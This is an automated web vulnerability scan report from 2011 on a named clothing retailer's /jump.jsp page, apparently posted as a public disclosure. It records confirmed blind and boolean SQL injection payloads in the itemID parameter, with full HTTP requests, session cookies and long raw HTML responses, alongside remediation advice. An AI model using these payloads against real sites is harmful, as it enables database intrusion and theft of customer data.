XSS, Cross Site Scripting, territoryahead.com, Javascript Injection, CWE-79, CAPEC-86

Netsparker - Scan Report Summary

TARGET URL	https://www.territoryahead.com/jump.jsp
SCAN DATE	3/2/2011 1:15:34 PM
REPORT DATE	3/2/2011 2:09:20 PM
SCAN DURATION	00:06:31

Total Requests

Average Speed

req/sec.

identified

confirmed

critical

informational

GHDB, DORK Tests

PROFILE	Previous Settings
ENABLED ENGINES	Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting

Authentication

Scheduled

VULNERABILITIES Vulnerabilities
	CRITICAL 14 % IMPORTANT 50 % LOW 14 % INFORMATION 21 %

Blind SQL Injection

1 TOTAL

CRITICAL

CONFIRMED

SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Reading, Updating and Deleting arbitrary data from the database
Executing commands on the underlying operating system
Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

See the remedy for solution.
If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
Locate the all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

MSDN - Protect From SQL Injection in ASP.NET

- /jump.jsp

/jump.jsp CONFIRMED

https://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((..

Parameters

Parameter	Type	Value
itemType	GET	CATEGORY
itemID	GET	(select dbms_pipe.receive_message((chr(95)\|\|chr(33)\|\|chr(64)\|\|chr(51)\|\|chr(100)\|\|chr(105)\|\|chr(108)\|\|chr(101)\|\|chr(109)\|\|chr(109)\|\|chr(97)),25) from dual)
path	GET	1,2,195,241

Request

GET /jump.jsp?itemType=CATEGORY&itemID=(select+dbms_pipe.receive_message((chr(95)%7c%7cchr(33)%7c%7cchr(64)%7c%7cchr(51)%7c%7cchr(100)%7c%7cchr(105)%7c%7cchr(108)%7c%7cchr(101)%7c%7cchr(109)%7c%7cchr(109)%7c%7cchr(97))%2c25)+from+dual)&path=1%2C2%2C195%2C241 HTTP/1.1
Referer: https://www.territoryahead.com/jump.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62381532; customer=92645377; mmlID=68409741; JSESSIONID=asM_YQOowXta; RecentViewedItems=9833/8773/9687/3443
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Mar 2011 19:18:23 GMT
Server: Apache
ETag: "AAAAS54AJLS"
Last-Modified: Wed, 02 Mar 2011 19:17:06 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="verify-v1" content="rSy1zNijA/te2NarLBOsqhIUGqxdoT7f9S8BYMrWFPg=" /><meta name="google-site-verification" content="Um1CvuVrWJqj36YpfI1-Aewx8_Xa-Ta58nlcpShy5XE" /><meta name="google-site-verification" content="BVV5owrN07EKc9WhcJpgHTWzZetedjsz5KmSE60see0" />

<title>The Territory Ahead</title>

<link rel='stylesheet' type='text/css' href='/includes/stylesheet.css' title='style'>
<link rel='stylesheet' type='text/css' href='/includes/global_stylesheet.css' title='style'>

<link rel='stylesheet' type='text/css' href='/text/css/tta_stylesheet.css' title='style'>



<script type="text/javascript" src="/includes/flyopen.js"></script>
<script type="text/javascript" src="/includes/rollover.js"></script>
<script type="text/javascript" src="/includes/cleartext.js"></script>
<script type="text/javascript" src="/text/js/sitedisplay.js"></script>

<script type="text/javascript">

</script>

<script type="text/javascript">
arImageList = new Array ();
arSubImageList = new Array ();

function preLoadCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arImageList[loop] = new Image();
arImageList[loop].src = images_array[loop];
}
}
function preLoadSubCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arSubImageList[loop] = new Image();
arSubImageList[loop].src = images_array[loop];
}
}
function changeCat(frm, thisbox) {
var optiontxt = thisbox.options[thisbox.selectedIndex].value;
if (optiontxt == "0"){
return;
}
location.href = optiontxt
//frm.action = optiontxt;
//alert (frm.action);
//frm.submit();
}

</script>

<script type="text/javascript" src="/menu/milonic_src.js"></script>
<script type="text/javascript">

</script>

<script type="text/javascript">

/*
Milonic DHTML Menu - JavaScript Website Navigation System.
Copyright 2004 (c) Milonic Solutions Limited. All Rights Reserved.
Version 5+ Data File structure is the property of Milonic Solutions Ltd and must only be used in Milonic DHTML Products
This is a commercial software product, please visit http://www.milonic.com/ for more information.
See http://www.milonic.com/license.php for Commercial License Agreement
All Copyright statements must always remain in place in all files at all times
******* PLEASE NOTE: THIS IS NOT FREE SOFTWARE, IT MUST BE LICENSED FOR ALL USE *******
*/

_menuCloseDelay=450 // The time delay for menus to remain visible on mouse out
_menuOpenDelay=80 // The time delay before menus open on mouse over
_subOffsetTop=0 // Sub menu top offset
_subOffsetLeft=-15 // Sub menu left offset

with(menuStyle=new mm_style()){
itemwidth=100;
onclass="menuItemOn";
offclass="menuItemOff";
onbgcolor="#FFFFFF";
oncolor="#000000";
onborder='1px solid #000000';
offbgcolor="#FFFFFF";
offcolor="#000000";
offborder='1px solid #000000';
bordercolor="#000000";
borderstyle="solid";
borderwidth=1;
separatorcolor="#FFFAF5";
separatorsize="0";
fontsize="11px";
fontstyle="normal";
fontfamily="Verdana, Tahoma, Arial";
pagebgcolor="#FFFAF5";
headercolor="#FFFFFF";
headerbgcolor="#ffffff";
subimagepadding="0";
overfilter="Fade(duration=0.0);Alpha(opacity=100);";
outfilter="randomdissolve(duration=0.0)";
}
with(menuStyle1057=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle4=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle5=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle6=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(milonic=new menuname("Menu1057")){style=menuStyle1057;aI("text=Men's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1058&itemType=CATEGORY&path=1%2C2%2C1057%2C1058;");aI("text=Women's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1064&itemType=CATEGORY&path=1%2C2%2C1057%2C1064;");}with(milonic=new menuname("Menu4")){style=menuStyle4;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=431&itemType=CATEGORY&path=1%2C2%2C4%2C431;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=25&itemType=CATEGORY&path=1%2C2%2C4%2C25;");aI("text=Sport Coats;url=http://www.territoryahead.com/jump.jsp?itemID=24&itemType=CATEGORY&path=1%2C2%2C4%2C24;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=341&itemType=CATEGORY&path=1%2C2%2C4%2C341;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=14&itemType=CATEGORY&path=1%2C2%2C4%2C14;");aI("text=Sweaters & Pullovers;url=http://www.territoryahead.com/jump.jsp?itemID=26&itemType=CATEGORY&path=1%2C2%2C4%2C26;");aI("text=T-Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=534&itemType=CATEGORY&path=1%2C2%2C4%2C534;");aI("text=Polos;url=http://www.territoryahead.com/jump.jsp?itemID=15&itemType=CATEGORY&path=1%2C2%2C4%2C15;");aI("text=Pants;url=http://www.territoryahead.com/jump.jsp?itemID=27&itemType=CATEGORY&path=1%2C2%2C4%2C27;");aI("text=Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=28&itemType=CATEGORY&path=1%2C2%2C4%2C28;");aI("text=Tall Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=134&itemType=CATEGORY&path=1%2C2%2C4%2C134;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=720&itemType=CATEGORY&path=1%2C2%2C4%2C720;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=29&itemType=CATEGORY&path=1%2C2%2C4%2C29;");aI("text=Guy Stuff Luggage & Bags;url=http://www.territoryahead.com/jump.jsp?itemID=192&itemType=CATEGORY&path=1%2C2%2C4%2C192;");aI("text=Men's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1232&itemType=CATEGORY&path=1%2C2%2C4%2C1232;");}with(milonic=new menuname("Menu5")){style=menuStyle5;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=32&itemType=CATEGORY&path=1%2C2%2C5%2C32;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=33&itemType=CATEGORY&path=1%2C2%2C5%2C33;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=440&itemType=CATEGORY&path=1%2C2%2C5%2C440;");aI("text=Sweaters;url=http://www.territoryahead.com/jump.jsp?itemID=31&itemType=CATEGORY&path=1%2C2%2C5%2C31;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=39&itemType=CATEGORY&path=1%2C2%2C5%2C39;");aI("text=Knit Tops & Tees;url=http://www.territoryahead.com/jump.jsp?itemID=38&itemType=CATEGORY&path=1%2C2%2C5%2C38;");aI("text=Dresses;url=http://www.territoryahead.com/jump.jsp?itemID=37&itemType=CATEGORY&path=1%2C2%2C5%2C37;");aI("text=Skirts;url=http://www.territoryahead.com/jump.jsp?itemID=36&itemType=CATEGORY&path=1%2C2%2C5%2C36;");aI("text=Pants & Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=35&itemType=CATEGORY&path=1%2C2%2C5%2C35;");aI("text=Petites;url=http://www.territoryahead.com/jump.jsp?itemID=170&itemType=CATEGORY&path=1%2C2%2C5%2C170;");aI("text=Womens Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=286&itemType=CATEGORY&path=1%2C2%2C5%2C286;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=166&itemType=CATEGORY&path=1%2C2%2C5%2C166;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=725&itemType=CATEGORY&path=1%2C2%2C5%2C725;");aI("text=Women's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1233&itemType=CATEGORY&path=1%2C2%2C5%2C1233;");}with(milonic=new menuname("Menu6")){style=menuStyle6;aI("text=Men's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=135&itemType=CATEGORY&path=1%2C2%2C6%2C135;");aI("text=Women's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=180&itemType=CATEGORY&path=1%2C2%2C6%2C180;");aI("text=Weekly Specials;url=http://www.territoryahead.com/jump.jsp?itemID=476&itemType=CATEGORY&path=1%2C2%2C6%2C476;");}
drawMenus();
</script>

</head>
<body class="main" >


<script language="javascript1.1" src="/text/cm/eluminate.js"></script>
<script language="javascript1.1" src="/text/cm/cmdatatagutils_territoryahead.js"></script>

<script language="javascript1.1" src="/includes/cm/cmtaggingservices_TTA_top.js"></script>




<div id="main-background"><div id="container">

<table align="center" border=0 width=980 cellpadding=0 cellspacing=0>
<tr>
<td colspan="5" class="siteborder"><img src="/images/us/global/globalgraphics/spacer01.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td class="siteborder"><img src="/images/us/global/globalgraphics/spacer01.gif" width="1" height="1" border="0" alt=""></td>
<td colspan=3 class=navheaderbg>





<table border=0 width=980 cellpadding=0 cellspacing=0>

<tr>
<td class="navheaderbg2"><a href="javascript:openMe('/text/customerservice/livechatpop.jsp?iProductID=','MoreInfo');"><img src="/images/us/global/globalnav/phnumber.gif" border="0" alt="1-800-882-4323" title="Live Chat"></a></td>
<td class="navheaderbg2" align="right"><table border="0" cellspacing="0" cellpadding="0" align="right">
<tr valign="middle">

<td><a href="https://www.territoryahead.com/account/login/loginmain.jsp" onMouseOver="rollover('top_login','/images/us/global/globalnav/login_on.gif');" onMouseOut="rollover('top_login','/images/us/global/globalnav/login_off.gif');"><img src="/images/us/global/globalnav/login_off.gif" border=0 alt="Log In" name="top_login"></a></td>

<td><a href="https://www.territoryahead.com/account/orderhistory/orderstatus.jsp" onMouseOver="rollover('top_orderstatus','/images/us/global/globalnav/orderstatus_on.gif');" onMouseOut="rollover('top_orderstatus','/images/us/global/globalnav/orderstatus_off.gif');"><img src="/images/us/global/globalnav/orderstatus_off.gif" border=0 alt="Order Status" name="top_orderstatus"></a></td>
<td><a href="http://www.territoryahead.com/jump.jsp?itemID=195&itemType=CATEGORY&path=1%2C3%2C195" onMouseOver="rollover('top_customerserv','/images/us/global/globalnav/customerserv_on.gif');" onMouseOut="rollover('top_customerserv','/images/us/global/globalnav/customerserv_off.gif');"><img src="/images/us/global/globalnav/customerserv_off.gif" border=0 alt="Customer Service" name="top_customerserv"></a></td>
<td><a href="http://www.territoryahead.com/shopping/catalogquickshop/cqsmain.jsp" onMouseOver="rollover('top_cqs','/images/us/global/globalnav/catquickshop_on.gif');" onMouseOut="rollover('top_cqs','/images/us/global/globalnav/catquickshop_off.gif');"><img src="/images/us/global/globalnav/catquickshop_off.gif" border=0 alt="Catalog Quickshop" name="top_cqs"></a></td>

<td class="navheaderbg3"><a href="http://www.territoryahead.com/basket/basketmain.jsp" onMouseOver="rollover('top_shopbasket','/images/us/global/globalnav/shopbasket_on.gif');" onMouseOut="rollover('top_shopbasket','/images/us/global/globalnav/shopbasket_off.gif');"><img src="/images/us/global/globalnav/shopbasket_off.gif" border=0 alt="Shopping Bag" name="top_shopbasket"></a></td>
<td class="navheaderbg3"><div class="iteminbagtext" nowrap>  (0 items) </div></td>
</tr>
</table></td>
</tr>
<tr>
<td colspan="2" class="navheaderrule1"><img src="/images/us/global/globalgraphics/spacer01.gif" width="980" height="1" border="0" alt=""></td>
</tr>
<tr>
<td colspan="2"><a href="http://www.territoryahead.com/jump.jsp?itemID=0&itemType=HOME_PAGE"><img alt="The Territory Ahead" src="/images/us/global/globalnav/logo01.jpg" border="0"></a></td>
</tr>
<tr>
<td colspan="2"><table id="menu" border="0" cellspacing="0" cellpadding="0" width="980">
<tr>
<td><a href="http://www.territoryahead.com/jump.jsp?itemID=0&itemType=HOME_PAGE" onMouseOver="rollover('top_home','/images/us/global/globalnav/home_on.gif');" onMouseOut="rollover('top_home','/images/us/global/globalnav/home_off.gif');"><img src="/images/us/global/globalnav/home_off.gif" border=0 alt="Home" name="top_home"></a></td>
<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=1057&path=1%2C2%2C1057' onmouseover="rollover('MenuImg1057','/images/us/global/globalnav/globalnav04_on.gif');popup('Menu1057','MenuImg1057');" onmouseout="rollover('MenuImg1057','/images/us/global/globalnav/globalnav04_off.gif');popdown();"><img border="0" name="MenuImg1057" id="MenuImg1057" src="/images/us/global/globalnav/globalnav04_off.gif" alt="What's New"></a></td>

<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=4&path=1%2C2%2C4' onmouseover="rollover('MenuImg4','/images/us//global/globalnav/globalnav01_on.gif');popup('Menu4','MenuImg4');" onmouseout="rollover('MenuImg4','/images/us//global/globalnav/globalnav01_off.gif');popdown();"><img border="0" name="MenuImg4" id="MenuImg4" src="/images/us//global/globalnav/globalnav01_off.gif" alt="Men's Territory"></a></td>

<td><a href='http://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=5&path=1%2C2%2C5' onmouseover="rollover('MenuImg5','/images/us..

Boolean Based SQL Injection

1 TOTAL

CRITICAL

CONFIRMED

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:

Reading, Updating and Deleting arbitrary data from the database
Executing commands on the underlying operating system
Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

See the remedy for solution.
If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

The best way to protect your code against SQL Injections is using parameterised queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

External References

Remedy References

MSDN - Protect From SQL Injection in ASP.NET

- /jump.jsp

/jump.jsp CONFIRMED

https://www.territoryahead.com/jump.jsp?itemType=CATEGORY&itemID=-1+OR+17-7%3d10&path=1%2C2%2C195%2C241

Parameters

Parameter	Type	Value
itemType	GET	CATEGORY
itemID	GET	-1 OR 17-7=10
path	GET	1,2,195,241

Request

GET /jump.jsp?itemType=CATEGORY&itemID=-1+OR+17-7%3d10&path=1%2C2%2C195%2C241 HTTP/1.1
Referer: https://www.territoryahead.com/jump.jsp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62381532; customer=92645377; mmlID=68409741; JSESSIONID=asM_YQOowXta; RecentViewedItems=9833/8773/9687/3443
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 19:26:38 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="verify-v1" content="rSy1zNijA/te2NarLBOsqhIUGqxdoT7f9S8BYMrWFPg=" /><meta name="google-site-verification" content="Um1CvuVrWJqj36YpfI1-Aewx8_Xa-Ta58nlcpShy5XE" /><meta name="google-site-verification" content="BVV5owrN07EKc9WhcJpgHTWzZetedjsz5KmSE60see0" />

<title>The Territory Ahead</title>

<link rel='stylesheet' type='text/css' href='/includes/stylesheet.css' title='style'>
<link rel='stylesheet' type='text/css' href='/includes/global_stylesheet.css' title='style'>

<link rel='stylesheet' type='text/css' href='/text/css/tta_stylesheet.css' title='style'>



<script type="text/javascript" src="/includes/flyopen.js"></script>
<script type="text/javascript" src="/includes/rollover.js"></script>
<script type="text/javascript" src="/includes/cleartext.js"></script>
<script type="text/javascript" src="/text/js/sitedisplay.js"></script>

<script type="text/javascript">

</script>

<script type="text/javascript">
arImageList = new Array ();
arSubImageList = new Array ();

function preLoadCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arImageList[loop] = new Image();
arImageList[loop].src = images_array[loop];
}
}
function preLoadSubCatImages(images_array) {
for(loop = 0; loop < images_array.length; loop++)
{
arSubImageList[loop] = new Image();
arSubImageList[loop].src = images_array[loop];
}
}
function changeCat(frm, thisbox) {
var optiontxt = thisbox.options[thisbox.selectedIndex].value;
if (optiontxt == "0"){
return;
}
location.href = optiontxt
//frm.action = optiontxt;
//alert (frm.action);
//frm.submit();
}

</script>

<script type="text/javascript" src="/menu/milonic_src.js"></script>
<script type="text/javascript">

</script>

<script type="text/javascript">

/*
Milonic DHTML Menu - JavaScript Website Navigation System.
Copyright 2004 (c) Milonic Solutions Limited. All Rights Reserved.
Version 5+ Data File structure is the property of Milonic Solutions Ltd and must only be used in Milonic DHTML Products
This is a commercial software product, please visit http://www.milonic.com/ for more information.
See http://www.milonic.com/license.php for Commercial License Agreement
All Copyright statements must always remain in place in all files at all times
******* PLEASE NOTE: THIS IS NOT FREE SOFTWARE, IT MUST BE LICENSED FOR ALL USE *******
*/

_menuCloseDelay=450 // The time delay for menus to remain visible on mouse out
_menuOpenDelay=80 // The time delay before menus open on mouse over
_subOffsetTop=0 // Sub menu top offset
_subOffsetLeft=-15 // Sub menu left offset

with(menuStyle=new mm_style()){
itemwidth=100;
onclass="menuItemOn";
offclass="menuItemOff";
onbgcolor="#FFFFFF";
oncolor="#000000";
onborder='1px solid #000000';
offbgcolor="#FFFFFF";
offcolor="#000000";
offborder='1px solid #000000';
bordercolor="#000000";
borderstyle="solid";
borderwidth=1;
separatorcolor="#FFFAF5";
separatorsize="0";
fontsize="11px";
fontstyle="normal";
fontfamily="Verdana, Tahoma, Arial";
pagebgcolor="#FFFAF5";
headercolor="#FFFFFF";
headerbgcolor="#ffffff";
subimagepadding="0";
overfilter="Fade(duration=0.0);Alpha(opacity=100);";
outfilter="randomdissolve(duration=0.0)";
}
with(menuStyle1057=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle4=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle5=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(menuStyle6=new mm_style()){itemwidth=165;onclass="menuItemOn";offclass="menuItemOff";bordercolor="#8D6B45";borderstyle="solid";borderwidth="1";}with(milonic=new menuname("Menu1057")){style=menuStyle1057;aI("text=Men's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1058&itemType=CATEGORY&path=1%2C2%2C1057%2C1058;");aI("text=Women's New Arrivals;url=http://www.territoryahead.com/jump.jsp?itemID=1064&itemType=CATEGORY&path=1%2C2%2C1057%2C1064;");}with(milonic=new menuname("Menu4")){style=menuStyle4;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=431&itemType=CATEGORY&path=1%2C2%2C4%2C431;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=25&itemType=CATEGORY&path=1%2C2%2C4%2C25;");aI("text=Sport Coats;url=http://www.territoryahead.com/jump.jsp?itemID=24&itemType=CATEGORY&path=1%2C2%2C4%2C24;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=341&itemType=CATEGORY&path=1%2C2%2C4%2C341;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=14&itemType=CATEGORY&path=1%2C2%2C4%2C14;");aI("text=Sweaters & Pullovers;url=http://www.territoryahead.com/jump.jsp?itemID=26&itemType=CATEGORY&path=1%2C2%2C4%2C26;");aI("text=T-Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=534&itemType=CATEGORY&path=1%2C2%2C4%2C534;");aI("text=Polos;url=http://www.territoryahead.com/jump.jsp?itemID=15&itemType=CATEGORY&path=1%2C2%2C4%2C15;");aI("text=Pants;url=http://www.territoryahead.com/jump.jsp?itemID=27&itemType=CATEGORY&path=1%2C2%2C4%2C27;");aI("text=Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=28&itemType=CATEGORY&path=1%2C2%2C4%2C28;");aI("text=Tall Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=134&itemType=CATEGORY&path=1%2C2%2C4%2C134;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=720&itemType=CATEGORY&path=1%2C2%2C4%2C720;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=29&itemType=CATEGORY&path=1%2C2%2C4%2C29;");aI("text=Guy Stuff Luggage & Bags;url=http://www.territoryahead.com/jump.jsp?itemID=192&itemType=CATEGORY&path=1%2C2%2C4%2C192;");aI("text=Men's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1232&itemType=CATEGORY&path=1%2C2%2C4%2C1232;");}with(milonic=new menuname("Menu5")){style=menuStyle5;aI("text=Jackets & Coats;url=http://www.territoryahead.com/jump.jsp?itemID=32&itemType=CATEGORY&path=1%2C2%2C5%2C32;");aI("text=Leather Jackets;url=http://www.territoryahead.com/jump.jsp?itemID=33&itemType=CATEGORY&path=1%2C2%2C5%2C33;");aI("text=Vests;url=http://www.territoryahead.com/jump.jsp?itemID=440&itemType=CATEGORY&path=1%2C2%2C5%2C440;");aI("text=Sweaters;url=http://www.territoryahead.com/jump.jsp?itemID=31&itemType=CATEGORY&path=1%2C2%2C5%2C31;");aI("text=Shirts;url=http://www.territoryahead.com/jump.jsp?itemID=39&itemType=CATEGORY&path=1%2C2%2C5%2C39;");aI("text=Knit Tops & Tees;url=http://www.territoryahead.com/jump.jsp?itemID=38&itemType=CATEGORY&path=1%2C2%2C5%2C38;");aI("text=Dresses;url=http://www.territoryahead.com/jump.jsp?itemID=37&itemType=CATEGORY&path=1%2C2%2C5%2C37;");aI("text=Skirts;url=http://www.territoryahead.com/jump.jsp?itemID=36&itemType=CATEGORY&path=1%2C2%2C5%2C36;");aI("text=Pants & Shorts;url=http://www.territoryahead.com/jump.jsp?itemID=35&itemType=CATEGORY&path=1%2C2%2C5%2C35;");aI("text=Petites;url=http://www.territoryahead.com/jump.jsp?itemID=170&itemType=CATEGORY&path=1%2C2%2C5%2C170;");aI("text=Womens Sizes;url=http://www.territoryahead.com/jump.jsp?itemID=286&itemType=CATEGORY&path=1%2C2%2C5%2C286;");aI("text=Accessories;url=http://www.territoryahead.com/jump.jsp?itemID=166&itemType=CATEGORY&path=1%2C2%2C5%2C166;");aI("text=Footwear;url=http://www.territoryahead.com/jump.jsp?itemID=725&itemType=CATEGORY&path=1%2C2%2C5%2C725;");aI("text=Women's Deals;url=http://www.territoryahead.com/jump.jsp?itemID=1233&itemType=CATEGORY&path=1%2C2%2C5%2C1233;");}with(milonic=new menuname("Menu6")){style=menuStyle6;aI("text=Men's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=135&itemType=CATEGORY&path=1%2C2%2C6%2C135;");aI("text=Women's Sale;url=http://www.territoryahead.com/jump.jsp?itemID=180&itemType=CATEGORY&path=1%2C2%2C6%2C180;");aI("text=Weekly Specials;url=http://www.territoryahead.com/jump.jsp?itemID=476&itemType=CATEGORY&path=1%2C2%2C6%2C476;");}
drawMenus();
</script>

</head>
<body class="main" >


<script language="javascript1.1" src="/text/cm/eluminate.js"></script>
<script language="javascript1.1" src="/text/cm/cmdatatagutils_territoryahead.js"></script>

<script language="javascript1.1" src="/includes/cm/cmtaggingservices_TTA_top.js"></script>




<div id="main-background"><div id="container">

<table align="center" border=0 width=980 cellpadding=0 cellspacing=0>
<tr>
<td colspan="5" class="siteborder"><img src="/images/us/global/globalgraphics/spacer01.gif" width="1" height="1" border="0" alt=""></td>
</tr>
<tr>
<td class="siteborder"><img src="/images/us/global/globalgraphics/spacer01.gif" width="1" height="1" border="0" alt=""></td>
<td colspan=3 class=navheaderbg>





<table border=0 width=980 cellpadding=0 cellspacing=0>

<tr>
<td class="navheaderbg2"><a href="javascript:openMe('/text/customerservice/livechatpop.jsp?iProductID=','MoreInfo');"><img src="/images/us/global/globalnav/phnumber.gif" border="0" alt="1-800-882-4323" title="Live Chat"></a></td>
<td class="navheaderbg2" align="right"><table border="0" cellspacing="0" cellpadding="0" align="right">
<tr valign="middle">

<td><a href="https://www.territoryahead.com/account/login/loginmain.jsp" onMouseOver="rollover('top_login','/images/us/global/globalnav/login_on.gif');" onMouseOut="rollover('top_login','/images/us/global/globalnav/login_off.gif');"><img src="/images/us/global/globalnav/login_off.gif" border=0 alt="Log In" name="top_login"></a></td>

<td><a href="https://www.territoryahead.com/account/orderhistory/orderstatus.jsp" onMouseOver="rollover('top_orderstatus','/images/us/global/globalnav/orderstatus_on.gif');" onMouseOut="rollover('top_orderstatus','/images/us/global/globalnav/orderstatus_off.gif');"><img src="/images/us/global/globalnav/orderstatus_off.gif" border=0 alt="Order Status" name="top_orderstatus"></a></td>
<td><a href="http://www.territoryahead.com/jump.jsp?itemID=195&itemType=CATEGORY&path=1%2C3%2C195" onMouseOver="rollover('top_customerserv','/images/us/global/globalnav/customerserv_on.gif');" onMouseOut="rollover('top_customerserv','/images/us/global/globalnav/customerserv_off.gif');"><img src="/images/us/global/globalnav/customerserv_off.gif" border=0 alt="Customer Service" name="top_customerserv"></a></td>
